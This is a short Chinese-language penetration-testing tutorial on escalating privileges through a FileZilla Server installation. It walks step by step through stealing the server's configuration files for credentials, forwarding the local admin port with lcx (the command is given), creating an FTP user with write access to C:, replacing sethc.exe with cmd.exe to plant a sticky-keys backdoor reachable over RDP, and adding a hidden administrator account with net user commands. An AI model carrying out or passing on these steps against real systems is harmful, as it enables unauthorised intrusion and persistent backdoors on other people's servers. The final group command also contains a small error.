0x00 FileZilla簡介
-
FileZilla是一個免費開源的FTP軟件,分爲客戶端版本和服務器版本,具備所有的FTP軟件功能。
-
FileZilla的默認端口爲
14147,只偵聽在127.0.0.1的14147端口上,所以無法從外部直接訪問,需要進行端口轉發(使用lcx 工具(lcx 具有三個功能:監聽、轉發、端口轉向))。默認安裝目錄下有兩個敏感文件filezillaserver.xml(包含用戶信息)和filezillaserverinterface.xml(包含管理信息)
0x01 提權步驟
1、下載這兩個文件,拿到管理密碼
2、查找該網站的可讀可寫目錄,然後上傳cmd.exe和lcx.exe到該目錄下
3、利用lcx端口轉發 默認只允許本機連接
lcx.exe -tran 14148 127.0.0.1 14147
4、以管理員用戶遠程登錄服務端程序
轉發成功後,通過FileZilla軟件進行連接,以管理員用戶登入
端口爲14148,密碼默認爲空
5、創建ftp用戶並進行權限設置
賦予C盤讀寫權限
6、用剛創建的用戶通過FileZilla的客戶端登錄ftp
7、使用cmd.exe改名爲sethc.exe替換C:\Windows\System32\sethc.exe生成shift後門
8、遠程登錄3389,按5次shift調出cmd.exe
9、添加一個用戶,並將其提升爲管理員權限
net user quan 123 /add
net localgroup administrator quan /add
0x02 參考文章
http://www.secist.com/archives/586.html